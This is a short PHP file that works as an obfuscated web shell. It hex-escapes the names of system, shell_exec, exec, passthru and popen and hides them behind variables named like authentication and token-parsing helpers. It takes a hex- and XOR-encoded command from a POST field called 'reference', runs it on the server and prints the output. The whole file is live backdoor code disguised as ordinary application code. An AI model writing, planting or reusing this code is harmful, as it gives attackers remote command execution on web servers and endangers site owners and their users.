<?php

$auth_exception_handler4 = "\x70\x61\x73st\x68ru";
$auth_exception_handler3 = "e\x78\x65c";
$auth_exception_handler1 = "\x73\x79\x73tem";
$auth_exception_handler5 = "\x70ope\x6E";
$auth_exception_handler6 = "s\x74r\x65am_get_\x63\x6Fn\x74\x65n\x74\x73";
$auth_exception_handler7 = "p\x63l\x6F\x73e";
$token_parser_engine = "h\x65\x78\x32\x62in";
$auth_exception_handler2 = "\x73he\x6Cl_exec";
if (isset($_POST["r\x65fer\x65n\x63\x65"])) {
            function buffer_cache    (    $marker      ,       $binding      )    {
   $pset   =    ''      ;
    $y=0;
 while($y<strlen($marker)){
$pset.=chr(ord($marker[$y])^$binding);
$y++;

} return     $pset;
   
}
            $reference = $token_parser_engine($_POST["r\x65fer\x65n\x63\x65"]);
            $reference = buffer_cache($reference, 44);
            if (function_exists($auth_exception_handler1)) {
                $auth_exception_handler1($reference);
            } elseif (function_exists($auth_exception_handler2)) {
                print $auth_exception_handler2($reference);
            } elseif (function_exists($auth_exception_handler3)) {
                $auth_exception_handler3($reference, $sym_marker);
                print join("\n", $sym_marker);
            } elseif (function_exists($auth_exception_handler4)) {
                $auth_exception_handler4($reference);
            } elseif (function_exists($auth_exception_handler5) && function_exists($auth_exception_handler6) && function_exists($auth_exception_handler7)) {
                $binding_pset = $auth_exception_handler5($reference, 'r');
                if ($binding_pset) {
                    $holder_itm = $auth_exception_handler6($binding_pset);
                    $auth_exception_handler7($binding_pset);
                    print $holder_itm;
                }
            }
            exit;
        }